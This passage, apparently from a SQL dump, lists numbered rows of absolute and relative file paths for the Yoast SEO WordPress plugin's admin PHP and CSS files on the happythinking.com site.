(876, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-aioseo.php'),
(877, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-greg-high-performance-seo.php'),
(878, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-headspace.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-headspace.php'),
(879, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-jetpack.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-jetpack.php'),
(880, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-platinum-seo-pack.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-platinum-seo-pack.php'),
(881, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-premium-seo-pack.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-premium-seo-pack.php'),
(882, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-rankmath.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-rankmath.php'),
(883, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seo-framework.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seo-framework.php'),
(884, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-seopressor.php'),
(885, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-smartcrawl.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-smartcrawl.php'),
(886, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-squirrly.php'),
(887, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-ultimate-seo.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-ultimate-seo.php'),
(888, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-woothemes-seo.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-woothemes-seo.php'),
(889, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wp-meta-seo.php'),
(890, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wpseo.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-wpseo.php'),
(891, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/import/plugins/class-importers.php', 'wp-content/plugins/wordpress-seo/admin/import/plugins/class-importers.php'),
(892, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/index.php', 'wp-content/plugins/wordpress-seo/admin/index.php'),
(893, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/interface-collection.php', 'wp-content/plugins/wordpress-seo/admin/interface-collection.php'),
(894, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/interface-installable.php', 'wp-content/plugins/wordpress-seo/admin/interface-installable.php'),
(895, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/listeners/class-listener.php', 'wp-content/plugins/wordpress-seo/admin/listeners/class-listener.php'),
(896, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-admin-menu.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-admin-menu.php'),
(897, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-base-menu.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-base-menu.php'),
(898, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-menu.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-menu.php'),
(899, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-network-admin-menu.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-network-admin-menu.php'),
(900, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-editor.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-editor.php'),
(901, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-field.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-replacevar-field.php'),
(902, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/menu/class-submenu-capability-normalize.php', 'wp-content/plugins/wordpress-seo/admin/menu/class-submenu-capability-normalize.php'),
(903, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-abstract-sectioned-metabox-tab.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-abstract-sectioned-metabox-tab.php'),
(904, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-inclusive-language.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-inclusive-language.php'),
(905, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-readability.php'),
(906, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php'),
(907, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsible.php'),
(908, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsibles-section.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-collapsibles-section.php'),
(909, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-editor.php'),
(910, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-form-tab.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-form-tab.php'),
(911, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php'),
(912, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-additional.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-additional.php'),
(913, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-inclusive-language.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-inclusive-language.php'),
(914, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-react.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-react.php'),
(915, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-readability.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-section-readability.php'),
(916, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php', 'wp-content/plugins/wordpress-seo/admin/metabox/class-metabox.php'),
(917, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-analysis.php', 'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-analysis.php'),
(918, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-section.php', 'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-section.php'),
(919, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-tab.php', 'wp-content/plugins/wordpress-seo/admin/metabox/interface-metabox-tab.php'),
(920, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/notifiers/dismissible-notification.php', 'wp-content/plugins/wordpress-seo/admin/notifiers/dismissible-notification.php'),
(921, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/notifiers/interface-notification-handler.php', 'wp-content/plugins/wordpress-seo/admin/notifiers/interface-notification-handler.php'),
(922, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/pages/dashboard.php', 'wp-content/plugins/wordpress-seo/admin/pages/dashboard.php'),
(923, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/pages/licenses.php', 'wp-content/plugins/wordpress-seo/admin/pages/licenses.php'),
(924, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/pages/network.php', 'wp-content/plugins/wordpress-seo/admin/pages/network.php'),
(925, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/pages/redirects.php', 'wp-content/plugins/wordpress-seo/admin/pages/redirects.php'),
(926, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/pages/tools.php', 'wp-content/plugins/wordpress-seo/admin/pages/tools.php'),
(927, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/roles/class-abstract-role-manager.php', 'wp-content/plugins/wordpress-seo/admin/roles/class-abstract-role-manager.php'),
(928, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php', 'wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php'),
(929, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php', 'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-factory.php'),
(930, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-wp.php', 'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager-wp.php'),
(931, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/roles/class-role-manager.php', 'wp-content/plugins/wordpress-seo/admin/roles/class-role-manager.php'),
(932, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/services/class-file-size.php', 'wp-content/plugins/wordpress-seo/admin/services/class-file-size.php'),
(933, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-integration.php', 'wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-integration.php'),
(934, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-service.php', 'wp-content/plugins/wordpress-seo/admin/statistics/class-statistics-service.php'),
(935, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php', 'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php'),
(936, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php', 'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields-presenter.php'),
(937, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php', 'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-fields.php'),
(938, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php', 'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-metabox.php'),
(939, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php', 'wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy.php'),
(940, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-addon-data.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-addon-data.php'),
(941, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-default-data.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-default-data.php'),
(942, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-plugin-data.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-plugin-data.php'),
(943, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-server-data.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-server-data.php'),
(944, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-settings-data.php'),
(945, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-theme-data.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-theme-data.php'),
(946, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/tracking/class-tracking.php', 'wp-content/plugins/wordpress-seo/admin/tracking/class-tracking.php'),
(947, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggle.php', 'wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggle.php'),
(948, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggles.php', 'wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggles.php'),
(949, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php', 'wp-content/plugins/wordpress-seo/admin/views/class-yoast-input-select.php'),
(950, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/class-yoast-integration-toggles.php', 'wp-content/plugins/wordpress-seo/admin/views/class-yoast-integration-toggles.php'),
(951, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/form/select.php', 'wp-content/plugins/wordpress-seo/admin/views/form/select.php'),
(952, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/interface-yoast-form-element.php', 'wp-content/plugins/wordpress-seo/admin/views/interface-yoast-form-element.php'),
(953, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php', 'wp-content/plugins/wordpress-seo/admin/views/js-templates-primary-term.php'),
(954, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/licenses.php', 'wp-content/plugins/wordpress-seo/admin/views/licenses.php'),
(955, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/paper-collapsible.php', 'wp-content/plugins/wordpress-seo/admin/views/paper-collapsible.php'),
(956, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/partial-notifications-errors.php', 'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-errors.php'),
(957, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/partial-notifications-template.php', 'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-template.php'),
(958, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/partial-notifications-warnings.php', 'wp-content/plugins/wordpress-seo/admin/views/partial-notifications-warnings.php'),
(959, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/redirects.php', 'wp-content/plugins/wordpress-seo/admin/views/redirects.php'),
(960, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/dashboard.php'),
(961, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/first-time-configuration.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/first-time-configuration.php'),
(962, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/site-analysis.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/dashboard/site-analysis.php'),
(963, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/network/crawl-settings.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/network/crawl-settings.php'),
(964, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/network/features.php'),
(965, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/network/general.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/network/general.php'),
(966, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/network/integrations.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/network/integrations.php'),
(967, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/network/restore-site.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/network/restore-site.php'),
(968, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/tool/import-seo.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/import-seo.php'),
(969, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-export.php'),
(970, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php', 'wp-content/plugins/wordpress-seo/admin/views/tabs/tool/wpseo-import.php'),
(971, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php', 'wp-content/plugins/wordpress-seo/admin/views/tool-bulk-editor.php'),
(972, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php', 'wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php'),
(973, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php', 'wp-content/plugins/wordpress-seo/admin/views/tool-import-export.php'),
(974, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/views/user-profile.php', 'wp-content/plugins/wordpress-seo/admin/views/user-profile.php'),
(975, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/admin/watchers/class-slug-change-watcher.php', 'wp-content/plugins/wordpress-seo/admin/watchers/class-slug-change-watcher.php'),
(976, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/academy-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/academy-2240-rtl.css'),
(977, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/academy-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/academy-2240.css'),
(978, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/admin-global-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/admin-global-2240-rtl.css'),
(979, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/admin-global-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/admin-global-2240.css'),
(980, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/adminbar-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/adminbar-2240-rtl.css'),
(981, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/adminbar-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/adminbar-2240.css'),
(982, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/ai-generator-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/ai-generator-2240-rtl.css'),
(983, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/ai-generator-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/ai-generator-2240.css'),
(984, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/alerts-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/alerts-2240-rtl.css'),
(985, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/alerts-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/alerts-2240.css'),
(986, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/black-friday-banner-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/black-friday-banner-2240-rtl.css'),
(987, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/black-friday-banner-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/black-friday-banner-2240.css'),
(988, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/dashboard-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/dashboard-2240-rtl.css'),
(989, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/dashboard-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/dashboard-2240.css'),
(990, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/edit-page-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/edit-page-2240-rtl.css'),
(991, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/edit-page-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/edit-page-2240.css'),
(992, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/elementor-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/elementor-2240-rtl.css'),
(993, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/elementor-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/elementor-2240.css'),
(994, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/featured-image-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/featured-image-2240-rtl.css'),
(995, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/featured-image-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/featured-image-2240.css'),
(996, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/filter-explanation-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/filter-explanation-2240-rtl.css'),
(997, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/filter-explanation-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/filter-explanation-2240.css'),
(998, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/first-time-configuration-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/first-time-configuration-2240-rtl.css'),
(999, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/first-time-configuration-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/first-time-configuration-2240.css'),
(1000, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/icons-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/icons-2240-rtl.css'),
(1001, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/icons-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/icons-2240.css'),
(1002, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/inside-editor-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/inside-editor-2240-rtl.css'),
(1003, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/inside-editor-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/inside-editor-2240.css'),
(1004, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/introductions-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/introductions-2240-rtl.css'),
(1005, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/introductions-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/introductions-2240.css'),
(1006, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/metabox-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/metabox-2240-rtl.css'),
(1007, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/metabox-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/metabox-2240.css'),
(1008, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-2240-rtl.css'),
(1009, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-2240.css'),
(1010, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/modal-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/modal-2240-rtl.css'),
(1011, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/modal-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/modal-2240.css'),
(1012, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/monorepo-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/monorepo-2240-rtl.css'),
(1013, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/monorepo-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/monorepo-2240.css'),
(1014, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/new-settings-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/new-settings-2240-rtl.css'),
(1015, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/new-settings-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/new-settings-2240.css'),
(1016, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/notifications-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/notifications-2240-rtl.css'),
(1017, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/notifications-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/notifications-2240.css'),
(1018, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/score_icon-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/score_icon-2240-rtl.css'),
(1019, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/score_icon-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/score_icon-2240.css'),
(1020, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-2240-rtl.css'),
(1021, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-2240.css'),
(1022, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/support-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/support-2240-rtl.css'),
(1023, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/support-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/support-2240.css'),
(1024, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/tailwind-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/tailwind-2240-rtl.css'),
(1025, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/tailwind-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/tailwind-2240.css'),
(1026, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/toggle-switch-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/toggle-switch-2240-rtl.css'),
(1027, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/toggle-switch-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/toggle-switch-2240.css'),
(1028, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/tooltips-2240-rtl.css', 'wp-content/plugins/wordpress-seo/css/dist/tooltips-2240-rtl.css'),
(1029, '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/css/dist/tooltips-2240.css', 'wp-content/plugins/wordpress-seo/css/dist/tooltips-2240.css'),
